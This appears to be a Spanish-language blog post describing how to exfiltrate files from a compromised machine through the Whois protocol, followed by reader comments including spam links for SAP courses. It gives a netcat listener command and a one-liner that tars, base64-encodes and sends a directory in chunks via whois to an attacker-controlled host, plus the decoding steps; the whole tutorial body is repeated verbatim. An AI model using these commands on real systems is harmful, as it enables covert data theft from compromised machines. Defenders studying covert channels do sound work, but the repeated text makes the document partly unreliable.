Hoy en día solemos abrir el navegador y usar servicios web de 'Whois' para consultar el dueño de un dominio o dirección IP. Pero no olvidemos que Whois es también un protocolo TCP que se creó en los años 80 y que todavía podemos usar desde la línea de comandos: sólo tenemos que tener el puerto 43/TCP abierto y podremos consultar directamente un dominio e información de AS e IP... ¿¿sólo??
Pues evidentemente y como habréis podido imaginar podemos usar también 'Whois' para el "mal", como por ejemplo exfiltrar información a través de este protocolo. Andy Kawa nos enseñaba un método sencillo para hacerlo. Veamos cómo...
En la máquina del atacante levantamos un netcat y lo dejamos a la escucha, volcando la salida también a un fichero:
ncat -k -l -p 4444 | tee files.b64
Y ahora, desde la máquina que hemos comprometido o desde la cual queremos transferirnos un fichero simplemente tenemos que empaquetar el directorio que queramos exfiltrar y mandarlo en base64 (recordar que tenemos que tener el puerto 43/TCP abierto). En mi caso, como veréis a continuación, en vez de mandar una cantidad determinada de bytes lo limitaré por número de caracteres:
tar czf - /path/to/directory/* | base64 | tr '\n' '\0' | xargs -0 -s 2000 timeout 0.03 whois -h attacker.machine.IP -p 4444
Una vez recibido el "stream" en base64 sólo tenemos que realizar los pasos a la inversa para obtener el binario:
$ file files.b64
files.b64: ASCII text, with very long lines, with CRLF line terminators
$ cat files.b64 | tr -d '\r\n\ ' | base64 -d > exfiltered.tar.gz
$ file exfiltered.tar.gz
exfiltered.tar.gz: gzip compressed data, last modified: Mon Aug 11 02:47:24 2019, from Unix
Y ya está! tenemos en la máquina del atacante el fichero transferido.
Pues evidentemente y como habréis podido imaginar podemos usar también 'Whois' para el "mal", como por ejemplo exfiltrar información a través de este protocolo. Andy Kawa nos enseñaba un método sencillo para hacerlo. Veamos cómo...
En la máquina del atacante levantamos un netcat y lo dejamos a la escucha, volcando la salida también a un fichero:
ncat -k -l -p 4444 | tee files.b64
Y ahora, desde la máquina que hemos comprometido o desde la cual queremos transferirnos un fichero simplemente tenemos que empaquetar el directorio que queramos exfiltrar y mandarlo en base64 (recordar que tenemos que tener el puerto 43/TCP abierto). En mi caso, como veréis a continuación, en vez de mandar una cantidad determinada de bytes lo limitaré por número de caracteres:
tar czf - /path/to/directory/* | base64 | tr '\n' '\0' | xargs -0 -s 2000 timeout 0.03 whois -h attacker.machine.IP -p 4444
Una vez recibido el "stream" en base64 sólo tenemos que realizar los pasos a la inversa para obtener el binario:
$ file files.b64
files.b64: ASCII text, with very long lines, with CRLF line terminators
$ cat files.b64 | tr -d '\r\n\ ' | base64 -d > exfiltered.tar.gz
$ file exfiltered.tar.gz
exfiltered.tar.gz: gzip compressed data, last modified: Mon Aug 11 02:47:24 2019, from Unix
SAP course in Delhi
ResponderEliminarSAP course in Noida
SAP course in Gurgaon
Buen aporte mi estimado
ResponderEliminar